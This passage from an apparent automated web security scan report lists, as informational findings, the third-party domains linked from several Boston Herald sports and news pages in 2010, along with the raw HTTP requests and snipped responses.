    <img id="183778" src="http://multimedia.heraldinteractive.com/images/20101029/stp/ac4cef_BU_10292010.jpg" title="HALASZ: Has BU back in America East tournament."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
title="Campaign cyber ‘buzz’ bodes well for Deval Patrick"
onclick="switchPhoto('183759');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183759" src="http://multimedia.heraldinteractive.com/images/20101028/stp/5922f5_Deval_10292010.jpg" title="PLUGGED IN: Gov. Deval Patrick shows off a tweet from his Twitter account to Greater Boston Food Bank CEO Catherine D’Amato."
alt="Matthew West (file)" style="margin:0 2px" />
</a>
...[SNIP]...
?articleid=1292311" title="Ethics board costs fortune yet does little"
onclick="switchPhoto('183754');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183754" src="http://multimedia.heraldinteractive.com/images/20101028/stp/a5e013_Waste_Deep_315x275.jpg" title=""
alt="Staff graphic" style="margin:0 2px" />
</a>
...[SNIP]...
g?articleid=1292136" title="Wild storm leaves behind damage, injuries"
onclick="switchPhoto('183679');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183679" src="http://multimedia.heraldinteractive.com/images/20101028/stp/51671e_dakotas10282010.jpg" title="Early morning traffic on Liberty Memorial Bridge over the Missouri River in Bismarck, N.D. was slower than normal due to decreased visibility from blowing snow and icy road conditions Wednesday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ew.bg?articleid=1292049" title="Group: Illegals are paying fair share"
onclick="switchPhoto('183622');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183622" src="http://multimedia.heraldinteractive.com/images/20101027/stp/0a22bd_Deval_10282010.jpg" title="Gov. Deval Patrick"
alt="Angela Rowlings" style="margin:0 2px" />
</a>
...[SNIP]...
rticleid=1292047" title="Did Justin Timberlake cheat on Jessica Biel?"
onclick="switchPhoto('183619');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183619" src="http://multimedia.heraldinteractive.com/images/20101027/stp/b47d4f_jess_10282010.jpg" title="Justin Timberlake is rumored to have cheated on girlfriend Jessica Biel, above, with “Daily Show” correspondent Olivia Munn, US Magazine reports. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1292038" title="Tonya Chen Mezrich files state bias complaint"
onclick="switchPhoto('183607');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183607" src="http://multimedia.heraldinteractive.com/images/20101027/stp/a1e75a_chen_10282010.jpg" title="DISPUTE: Tonya Chen Mezrich, left, wife of Hub hotshot author Ben, claims in a filing with the state that ‘styleboston’ TV show creator Terri Stanley, right, fired her because she was pregnant."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
5" title="Students from Andover face drug charges at Georgetown Univ."
onclick="switchPhoto('183541');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183541" src="http://multimedia.heraldinteractive.com/images/20101027/stp/5fe0fc_harb.jpg" title="Harbin Hall dormitory, which houses first-year students, is seen on the Georgetown University campus in Washington, Wednesday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
rticleid=1291805" title="Illegals’ medical bills top $35.7M"
onclick="switchPhoto('183439');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183439" src="http://multimedia.heraldinteractive.com/images/20101026/stp/07fb42_immi_10272010.jpg" title="Compiled by Jessica Van Sack."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
rticleid=1291805" title="Illegals’ medical bills top $35.7M"
onclick="switchPhoto('183518');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183518" src="http://multimedia.heraldinteractive.com/images/20101027/stp/dac5aa_ltpEMS102710.jpg" title="A pair of Boston EMS ambulances are seen in the above Herald file photo. Massachusetts and U.S. taxpayers coughed up a staggering $35.7 million this year in free emergency health care for more than 52,000 illegal aliens in the Bay State."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1291803" title="Nikki Tsongas: Give William Lantigua a chance"
onclick="switchPhoto('183432');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183432" src="http://multimedia.heraldinteractive.com/images/20101026/stp/9471bf_tsongas_10272010.jpg" title="IN IT TO WIN: Fifth District incumbent U.S. Rep. Niki Tsongas meets with the Herald Editorial Board."
alt="Patrick Whittemore" style="margin:0 2px" />
</a>
...[SNIP]...
539" title="Barney Frank: Finance law won’t steer cos. offshore"
onclick="switchPhoto('183282');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183282" src="http://multimedia.heraldinteractive.com/images/20101025/stp/5e2631_frank_10262010.jpg" title="FORUM ON REFORM: U.S. Rep. Barney Frank, left, FDIC Chairwoman Sheila Bair, center, and Economic Recovery Board Chairman Paul Volcker speak at a Boston College event yesterday.
"
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.43. http://bostonherald.com/sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/sports/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2F&c5=&c6=&c15=
http://bh.heraldinteractive.com/sports/includes/scoreboards/bruins.html
http://bh.heraldinteractive.com/sports/includes/scoreboards/celtics.html
http://bh.heraldinteractive.com/sports/includes/scoreboards/patriots.html
http://bh.heraldinteractive.com/sports/includes/scoreboards/redsox.html
http://bh.heraldinteractive.com/sports/includes/scoreboards/revolution.html
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/blogLogos/celticsInsider.gif
http://cache.heraldinteractive.com/images/siteImages/blogLogos/connellysTopTen.gif
http://cache.heraldinteractive.com/images/siteImages/blogLogos/rap_sheet.gif
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.html?id=bostonheraldsectiongeneric&w=300&h=428
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports
http://feeds.feedburner.com/bostonherald/sports/
http://feeds.feedburner.com/bostonherald/sports/baseball/red_sox/
http://feeds.feedburner.com/bostonherald/sports/basketball/celtics
http://feeds.feedburner.com/bostonherald/sports/college
http://feeds.feedburner.com/bostonherald/sports/columnists/
http://feeds.feedburner.com/bostonherald/sports/football/patriots/
http://feeds.feedburner.com/bostonherald/sports/golf
http://feeds.feedburner.com/bostonherald/sports/hockey/bruins/
http://feeds.feedburner.com/bostonherald/sports/soccer/revolution/
http://feeds.feedburner.com/bostonherald/sports/sports/high_school/
http://feeds.feedburner.com/bostonherald/sports/sports/other_sports/
http://multimedia.heraldinteractive.com/images/20101107/stp/2e3389_brady_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/56a07e_Krej_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/5c2f67_kg_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/d46b50_ltpsanch20101107.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/f64415_Gonzo_12172009.jpg
http://multimedia.heraldinteractive.com/images/20101108/bedf5e_kyle_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/26d579_dave_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/38e59d_mike_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/3e9f16_becks_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/590145_aaron_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/60ecdd_nerl_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/ae4d3c_marq_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/bedf5e_kyle_11082010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/individual.aspx?team=028
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/teamstats.aspx?team=028
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/TEAMSTAT092.htm
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/roster.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/teamstats.aspx?team=121
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=soc-mls/teams/INDSTAT995.htm
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=soc-mls/teams/ROSTER995.htm
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=soc-mls/teams/sched/995.htm
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.feedburner.com/fb/a/feed101
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.twitter.com/
http://www.uclick.com/client/boh/sudoc/

Request

GET /sports/?srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:12:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 114936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   

   <link rel="alternate" title="Sports - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/sports/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
<iframe id="csprt" frameborder="0" align="top,left" marginheight="0" marginwidth="0" scrolling="no" width="300" height="428" src="http://cdn.cinesport.com/container.html?id=bostonheraldsectiongeneric&w=300&h=428"></iframe>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.44. http://bostonherald.com/sports/baseball/red_sox/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/baseball/red_sox/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/sports/baseball/red_sox/view.bg?articleid=1294632&srvc=home&position=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Fbaseball%2Fred_sox%2Fview%2F20101107adrian_gonzalez_fit_for_red_sox_eventually%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/stpjohnTomase.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports/baseball/red_sox/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101107/f64415_Gonzo_12172009.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/players.aspx?id=18067,pos=SS,team=028
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/players.aspx?id=19004,pos=CF,team=028,T=1
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/players.aspx?id=3405,pos=DH,team=028
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/players.aspx?id=6816,pos=1B,team=028
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/teamstats.aspx?team=028
http://twitter.com/bostonherald
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /sports/baseball/red_sox/view.bg?articleid=1294632&srvc=home&position=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:17:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Fbaseball%2Fred_sox%2Fview%2F20101107adrian_gonzalez_fit_for_red_sox_eventually%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Adrian Gonzalez fit for Red Sox eventually');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/teamstats.aspx?team=028" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/players.aspx?id=3405,pos=DH,team=028" >stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/players.aspx?id=19004,pos=CF,team=028,T=1" >stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/players.aspx?id=6816,pos=1B,team=028" >stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/players.aspx?id=18067,pos=SS,team=028" >stats</a>
...[SNIP]...
<a href="/sports/baseball/red_sox/view.bg?articleid=1294632&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(185) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/f64415_Gonzo_12172009.jpg" alt="San Diego slugger Adrian Gonzalez" /></div>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Fbaseball%2Fred_sox%2Fview%2F20101107adrian_gonzalez_fit_for_red_sox_eventually%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.45. http://bostonherald.com/sports/columnists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/columnists/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/sports/columnists/?srvc=home&position=emailed

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Fcolumnists%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports/columnists/
http://multimedia.heraldinteractive.com/images/20101101/stp/73ce75_randymoss_11022010.jpg
